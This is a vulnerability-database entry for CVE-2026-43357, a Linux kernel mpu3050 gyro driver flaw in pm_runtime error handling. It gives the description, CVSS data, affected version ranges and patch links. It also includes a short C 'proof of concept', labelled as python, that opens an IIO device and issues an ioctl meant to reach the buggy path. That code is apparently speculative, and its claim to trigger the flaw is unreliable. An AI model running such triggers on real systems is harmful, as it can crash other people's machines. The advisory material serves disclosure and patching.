Security Vulnerability Report
中文
CVE-2026-43357 CVSS 5.5 MEDIUM

CVE-2026-43357

Published: 2026-05-08 15:16:46
Last Modified: 2026-05-15 16:03:01
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved: iio: gyro: mpu3050-core: fix pm_runtime error handling The return value of pm_runtime_get_sync() is not checked, allowing the driver to access hardware that may fail to resume. The device usage count is also unconditionally incremented. Use pm_runtime_resume_and_get() which propagates errors and avoids incrementing the usage count on failure. In preenable, add pm_runtime_put_autosuspend() on set_8khz_samplerate() failure since postdisable does not run when preenable fails.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
Linux Kernel (stable branches containing mpu3050-core.c prior to commits 2a86a39, 35f54e7, 42685cf, 66c0d1d, 7a3dec5)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
/* * Conceptual Proof of Concept for CVE-2026-43357 * This code attempts to trigger the vulnerable code path in the mpu3050 driver. * It requires a system with the vulnerable kernel version and the mpu3050 hardware present. * Compile: gcc poc.c -o poc */ #include <stdio.h> #include <stdlib.h> #include <fcntl.h> #include <unistd.h> #include <sys/ioctl.h> #include <errno.h> // Define the ioctl command to enable the buffer (triggering preenable) // The actual magic number may vary depending on kernel configuration #define IIO_BUFFER_GET_FD_IOCTL _IOWR('i', 0x91, int) int main() { const char *device_path = "/dev/iio:device0"; // Common path for IIO devices int fd = -1; int buffer_fd = -1; int ret; printf("[*] Attempting to open %s...\n", device_path); fd = open(device_path, O_RDWR); if (fd < 0) { perror("[-] Failed to open device"); printf("[-] Hint: The device may not exist or you may lack permissions.\n"); return 1; } printf("[+] Device opened successfully.\n"); printf("[*] Attempting to trigger buffer enable (preenable path)...\n"); // This ioctl triggers the buffer setup sequence. // Inside the kernel, this calls iio_buffer_enable(), then preenable(). // preenable() calls pm_runtime_get_sync() without checking the return value. ret = ioctl(fd, IIO_BUFFER_GET_FD_IOCTL, &buffer_fd); if (ret < 0) { perror("[-] ioctl failed"); // Failure is expected if hardware is not physically present or simulating fault printf("[*] If the kernel crashes here or behaves erratically, the vulnerability is triggered.\n"); } else { printf("[+] ioctl succeeded. Buffer FD: %d\n", buffer_fd); close(buffer_fd); } close(fd); printf("[*] PoC execution finished.\n"); return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-43357", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-08T15:16:46.477", "lastModified": "2026-05-15T16:03:01.143", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\niio: gyro: mpu3050-core: fix pm_runtime error handling\n\nThe return value of pm_runtime_get_sync() is not checked, allowing\nthe driver to access hardware that may fail to resume. The device\nusage count is also unconditionally incremented. Use\npm_runtime_resume_and_get() which propagates errors and avoids\nincrementing the usage count on failure.\n\nIn preenable, add pm_runtime_put_autosuspend() on set_8khz_samplerate()\nfailure since postdisable does not run when preenable fails."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.10", "versionEndExcluding": "5.10.253", "matchCriteriaId": "6295619F-1E94-4D58-A683-135EACD0504E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.203", "matchCriteriaId": "20DDB3E9-AABF-4107-ADB0-5362AA067045"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.167", "matchCriteriaId": "2EDC6BAF-B710-4E26-B6AA-D68922EE7B43"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.6.130", "matchCriteriaId": "C57BB918-DF28-46B3-94F7-144176841267"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.78", "matchCriteriaId": "28D591F5-B196-4CC9-905C-DC80F116E7A8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.19", "matchCriteriaId": "D394AC60-6F28-435F-872A-CCDF384B8331"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.9", "matchCriteriaId": "E825E7C3-FEAC-4FD3-8A81-78D7387948C9"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "F253B622-8837-4245-BCE5-A7BF8FC76A16"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "4AE85AD8-4641-4E7C-A2F4-305E2CD9EE64"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc3:*:*:*:*:*:*", "matchCriteriaId": "F666C8D8-6538-46D4-B318-87610DE64C34"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/2a86a396aa001a9f9ba2d37dda36573a76f17c90", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/35f54e7bcb1eccdc6e5bff06580eeef2e0ff3677", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/42685cf96e28262e0b84d74447f3d99f3f6a72e0", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/66c0d1d600e7be034959cf49edab104cb5a39258", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7a3dec5b265cf87678b10c98a72a435a8e769bb7", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/8544c488e50206f00630a8bbba43d2c8bd290345", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/935f57dd43492240e1ca220dd065d624efece6be", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/acc3949aab3e8094641a9c7c2768de1958c88378", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.